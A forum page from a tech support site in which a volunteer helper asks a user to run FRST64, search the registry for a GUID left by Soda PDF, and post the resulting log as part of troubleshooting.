Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're welcome. I don't know what "se" and "de" mean.

Those commands aren't supposed to stay bolded when copied/pasted.

It's just to make clear to users what is supposed to be copied/pasted.

And, yes, that DOS screen will flash quickly, that is normal.

Sounds like Soda PDF 6 has already been uninstalled.

------------------------------------------------------

Run FRST64 again. Copy/paste the following bolded text into the Search window and click 'Search Registry':

{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Once done, a log will pop open. Please copy/paste the contents of the log here in your next reply.

The log, Search.txt, will also be saved at the same location that FRST64.exe is located.

------------------------------------------------------

Did you try manually installing that update?

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] BSOD when accessing internet
Hi, OS - Vista/ Windows 7 ? : Vista SP 2 · x86 (32-bit) or x64 : 32-bit · What was original installed OS on system? :Vista · Is the OS an OEM version (came pre-installed on system) or full retail version (YOU purchased it from retailer)? : Full retail · Age of system (hardware): 3-4 years ·...
eraonel BSOD, App Crashes And Hangs 11 02-01-2012 12:41 PM
computer restarts
computer keeps restarting when I am online. got pc checked fully. no problem. thought usb modem used for dsl connection (speedtouch 330) may be the problem. so shifted to dialup but the problem continues. what can be the problem? am attaching a dump file which was created. would deeply appreciate...
kpsomu BSOD, App Crashes And Hangs 11 10-05-2011 11:47 PM
Search engines (bing, yahoo...) & all google pages (mail, calendar...) refuse to load
Good morning! I think I am posting everything as requested - if there's anything else you need to help me or I am submitting incorrectly, please let me know. Thank you! ~Robyn My situation My computer started having problems a few days ago with redirects when clicking on search results. My...
robynrld Resolved HJT Threads 31 08-19-2011 01:00 PM
Malware/popup/redirects
Hi Recently my machines been running very slow (Win XP, SP 4), then recently on Mozilla 4.0 new tabs started appearing. I found a folder in Documents and Settings/Network Service/Local Settings which was 'temp' which had lots of jpgs/html/javascript, like these were the dodgy HTML pages...
psj3809 Resolved HJT Threads 48 04-14-2011 01:45 PM

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
 > FAQ
  > 10.0.0.2
Powered by vBadvanced CMPS v3.2.3


All times are GMT -7. The time now is 02:35 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
vBulletin Security provided by vBSecurity v2.2.2 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
User Alert System provided by Advanced User Tagging v3.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
Copyright 2001 - 2018, Tech Support Forum

Windows 10 - Windows 7 - Windows XP - Windows Vista - Trojan Removal - Spyware Removal - Virus Removal - Networking - Security - Top Web Hosts